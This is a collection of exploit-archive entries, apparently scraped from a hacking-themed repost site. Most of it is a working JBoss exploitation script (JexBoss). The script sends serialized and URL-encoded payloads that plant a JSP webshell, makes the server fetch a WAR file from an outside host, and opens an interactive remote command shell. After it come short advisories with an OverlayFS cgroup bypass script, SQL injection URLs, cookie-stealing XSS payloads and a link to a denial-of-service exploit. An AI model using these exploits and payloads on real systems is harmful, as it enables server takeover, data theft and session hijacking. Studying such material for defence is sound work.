	# exploitWebConsoleInvoker:		   tested and working in jboss 4
	# exploitJMXInvokerFileRepository: tested and working in jboss 4 and 5
	
	print GREEN + ("\n * Sending exploit code to %s. Wait...\n" %url)
	result = 505
	if type == "jmx-console":
		result = exploitJmxConsoleFileRepository(url)
		if result != 200 and result != 500:
			result = exploitJmxConsoleMainDeploy(url)
	elif type == "web-console":
		result = exploitWebConsoleInvoker(url)
	elif type == "JMXInvokerServlet":
		result = exploitJMXInvokerFileRepository(url)

	if result == 200 or result == 500:
		print GREEN + " * Successfully deployed code! Starting command shell, wait...\n" + ENDC
		shell_http(url, type)
	else:
		print (RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" 
				    "   Waiting for 7 seconds...\n "+ ENDC)
		time.sleep(7)

def shell_http(url, type):
	if type == "jmx-console" or type == "web-console":
		path = '/jbossass/jbossass.jsp?'
	elif type == "JMXInvokerServlet":
		path = '/shellinvoker/shellinvoker.jsp?'

	conn = getConnection(url)
	conn.request("GET", path)
	conn.close()
	time.sleep(7)
	resp = ""
	#clear()
	print " * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n"
	print RED+" * "+url+": \n"+ENDC
	headers = {"User-Agent" : "jexboss"}
	for cmd in ['uname -a', 'cat /etc/issue', 'id']:
		conn = getConnection(url)
		cmd = urlencode({"ppp": cmd})
		conn.request("GET", path+cmd, '', headers)
		resp += " "+conn.getresponse().read().split(">")[1]
	print resp,
	
	while 1:
		print BLUE + "[Type commands or \"exit\" to finish]"
		cmd=raw_input("Shell> "+ENDC)
		#print ENDC
		if cmd == "exit":
			break
		conn = getConnection(url)
		cmd = urlencode({"ppp": cmd})
		conn.request("GET", path+cmd, '', headers)
		resp = conn.getresponse()
		if resp.status == 404:
			print RED+ " * Error contacting the commando shell. Try again later..."
			conn.close()
			continue
		stdout = ""
		try:
			stdout = resp.read().split("pre>")[1]
		except:
			print RED+ " * Error contacting the commando shell. Try again later..."
		if stdout.count("An exception occurred processing JSP page") == 1:
			print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC
		else: print stdout,
		conn.close()

def exploitJmxConsoleMainDeploy(url):
	# MainDeployer
	# does not work in jboss5 (bug in jboss5)
	# shell in link
	# /jmx-console/HtmlAdaptor
	jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
	payload =(  "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service"
				"=MainDeployer&methodIndex=19&arg0="+jsp)
	print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell "
			       "\n   available on: "+jsp +ENDC)
	conn = getConnection(url)
	conn.request("HEAD", payload)
	result = conn.getresponse().status
	conn.close()
	return getSuccessfully(url, "/jbossass/jbossass.jsp")	

def exploitJmxConsoleFileRepository(url):
		# DeploymentFileRepository
		# tested and work in jboss4, 5.
		# doest not work in jboss6
		# shell jsp
		# /jmx-console/HtmlAdaptor
		jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61"
			  "%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C"
			  "%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"
			  "%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20"
			  "%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65"
			  "%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71"
			  "%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72"
			  "%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74"
			  "%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73"
			  "%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29"
			  "%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69"
			  "%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65"
			  "%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29"
			  "%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E"
			  "%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64"
			  "%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70"
			  "%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20"
			  "%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" )
			  
		payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
		           "DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
		           "jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St"
		           "ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True")
		
		conn = getConnection(url)
		conn.request("HEAD", payload)
		result = conn.getresponse().status
		conn.close()
		return getSuccessfully(url, "/jbossass/jbossass.jsp")
		
def exploitJMXInvokerFileRepository(url):
	# tested and work in jboss4, 5
	# MainDeploy, shell in data
	# /invoker/JMXInvokerServlet
	payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"
				"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"
				"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"
				"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"
				"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"
				"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"
				"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"
				"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"
				"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"
				"\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"
				"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"
				"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"
				"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"
				"\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"
				"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"
				"\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"
				"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"
				"\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"
				"\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"
				"\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"
				"\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"
				"\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"
				"\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"
				"\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"
				"\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"
				"\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"
				"\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"
				"\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
				"\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"
				"\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"
				"\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"
				"\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"
				"\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"
				"\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"
				"\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"
				"\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"
				"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"
				"\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"
				"\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"
				"\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"
				"\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"
				"\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"
				"\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"
				"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"
				"\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"
				"\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"
				"\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"
				"\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"
				"\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"
				"\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"
				"\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"
				"\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"
				"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
				"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"
				"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
				"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"
				"\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"
				"\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"
				"\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"
				"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"
				"\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"
				"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"
				"\x00\x04\x70\x78")
	conn = getConnection(url)
	headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
				"Accept"  : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
	conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers)
	response = conn.getresponse()
	result = response.status
	if result == 401:
		print "   Retrying..."
		conn.close()
		conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers)
		response = conn.getresponse()
		result = response.status
	if response.read().count("Failed") > 0:
		result = 505
	conn.close
	return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp")
	
def exploitWebConsoleInvoker(url):
	# does not work in jboss5 (bug in jboss5)
	# MainDeploy, shell in link
	# /web-console/Invoker
	#jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
	#jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp)
	#jsp = "\\x" + jsp
	payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e"
				"\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65"
				"\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e"
				"\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae"
				"\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61"
				"\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f"
				"\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73"
				"\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f"
				"\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75"
				"\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"
				"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65"
				"\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a"
				"\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f"
				"\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06"
				"\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61"
				"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58"
				"\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
				"\x2a"
				#link
				"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61"
				"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f"
				"\x73\x73\x61\x73\x73\x2e\x77\x61\x72"
				#end
				"\x75\x72\x00\x13\x5b"
				"\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e"
				"\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"
				"\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e"
				"\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e"
				"\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63"
				"\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00"
				"\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"
				"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65"
				"\x70\x6c\x6f\x79\x65\x72\x78")
	conn = getConnection(url)
	headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
				"Accept"  : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
	conn.request("POST", "/web-console/Invoker", payload, headers)
	response = conn.getresponse()
	result = response.status
	if result == 401:
		print "   Retrying..."
		conn.close()
		conn.request("HEAD", "/web-console/Invoker", payload, headers)
		response = conn.getresponse()
		result = response.status
	conn.close
	return getSuccessfully(url, "/jbossass/jbossass.jsp")

	
def clear():
	if os.name == 'posix':
		os.system('clear')
	elif os.name == ('ce', 'nt', 'dos'):
		os.system('cls')

def checkArgs(args):
	if len(args) < 2 or args[1].count('.') < 1:
		return 1,"You must provide the host name or IP address you want to test."
	elif len(args[1].split('://')) == 1:
		return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1])
	elif args[1].count('http') == 1 and args[1].count('.') > 1:
		return 0, ""
	else:
		return 1, 'Parâmetro inválido'

def banner():
	clear()
	print (RED1+"\n * --- JexBoss: Jboss verify and EXploitation Tool  --- *\n"
  	          " |                                                      |\n"
              " | @author:  João Filho Matos Figueiredo                |\n"
              " | @contact: joaomatosf@gmail.com                       |\n"
	          " |                                                      |\n"
	          " | @update: https://github.com/joaomatosf/jexboss       |\n"
              " #______________________________________________________#\n\n" )

banner()
# check python version
if sys.version_info[0] == 3:
	print (RED + "\n * Not compatible with version 3 of python.\n"
				  "   Please run it with version 2.7 or lower.\n\n"
			+BLUE+" * Example:\n"
				  "   python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC )
	sys.exit(1)

# check Args
status, message = checkArgs(sys.argv)
if status == 0:
	url = sys.argv[1]
elif status == 1:
	print RED + "\n * Error: %s" %message
	print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC
	sys.exit(status)
elif status == 2:
	url = ''.join(['http://',sys.argv[1]])

# check vulnerabilities
mapResult = checkVul(url)

# performs exploitation
for i in ["jmx-console", "web-console", "JMXInvokerServlet"]:
	if mapResult[i] == 200 or mapResult[i] == 500:
		print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n"
			   	      "   This operation will provide a simple command shell to execute commands on the server..\n"
			   	 +RED+"   Continue only if you have permission!" +ENDC)
		if raw_input("   yes/NO ? ").lower() == "yes":
			autoExploit(url, i)

# resume results
if mapResult.values().count(200) > 0:
	banner()
	print RED+ " Results: potentially compromised server!" +ENDC
	print (GREEN+" * - - - - - - -  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n"
			  " Recommendations: \n"
			  " - Remove web consoles and services that are not used, eg:\n"
			  "    $ rm web-console.war\n"
			  "    $ rm http-invoker.sar\n"
			  "    $ rm jmx-console.war\n"
			  "    $ rm jmx-invoker-adaptor-server.sar\n"
			  "    $ rm admin-console.war\n"
			  " - Use a reverse proxy (eg. nginx, apache, f5)\n"
			  " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"
			  " - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n"
			  " References:\n"
			  "   [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"
			  "   [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"
			  "\n"
			  " - If possible, discard this server!\n\n"
			  " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" )
elif mapResult.values().count(505) == 0:
	print ( GREEN+ "\n\n * Results: \n"
			"   The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)

# infos	
print (ENDC+" * Info: review, suggestions, updates, etc: \n"
			 "   https://github.com/joaomatosf/jexboss\n"
			 "   joaomatosf@gmail.com\n")

print ENDC
HireHackking 
source: https://www.securityfocus.com/bid/51533/info

Freelance Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/freelance/show_code.php?code_id=8â??a
HireHackking 
source: https://www.securityfocus.com/bid/51532/info

MMORPG Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/games/view_news.php?news_id=7â??a
HireHackking 
source: https://www.securityfocus.com/bid/51530/info

Toner Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/united/show_series_ink.php?id=1â??a
HireHackking 
#source: https://www.securityfocus.com/bid/51529/info

#OverlayFS is prone to a local security-bypass vulnerability.

#Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions. 



#!/bin/bash

ddir=`cat /proc/self/mountinfo | grep cgroup | grep devices | awk '{ print $5 }'`
if [ "x$ddir" = "x" ]; then
 echo "couldn't find devices cgroup mountpoint"
 exit 1
fi

# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-XXXX`

# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-XXXX`

# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`

mount -t overlayfs -oupperdir=$udir,lowerdir=/dev none $odir
echo $$ > $ndir/tasks
# deny all device actions
echo a > $ndir/devices.deny
# but allow mknod of tty7, bc we have to mknod it in the writeable
# overlay
echo "c 4:5 m" > $ndir/devices.allow
echo "devices.list: XXXXXXXXXXXXXXX"
cat $ndir/devices.list
echo "XXXXXXXXXXXX"

# try writing to /dev/tty5 - not allowed
echo x > /dev/tty5
echo "write to /dev/tty5 returned $?"

# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y > $odir/tty5
echo "write to $odir/tty5 returned $?"

umount $odir
rmdir $odir
rm -rf $udir

# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ > $ddir/tasks
rmdir $ndir
HireHackking 
source: https://www.securityfocus.com/bid/51431/info

Giveaway Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Giveaway Manager 3 is vulnerable; other versions may also be affected.

http://www.example.com/members.php?id=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/51444/info

Rockwell Automation FactoryTalk Activation Server is prone to multiple remote denial-of-service vulnerabilities.

An attacker can exploit these issues to crash the affected application, denying service to legitimate users. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36570.zip
HireHackking 
source: https://www.securityfocus.com/bid/51428/info

phpVideoPro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

phpVideoPro 0.9.7 is vulnerable; prior versions may also be affected. 

http://www.example.com/phpvideopro-0.9.7/help/index.php?topic=&#039;"</script><script>alert(document.cookie)</script>
http://www.example.com/phpvideopro-0.9.7/login/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/configure.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/medialist.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/setfilter.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/search.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/listgen.php/"><script>alert(document.cookie)</script><"
http://www.example.com/phpvideopro-0.9.7/label.php/"><script>alert(document.cookie)</script><"
HireHackking 
source: https://www.securityfocus.com/bid/51434/info

Annuaire PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss]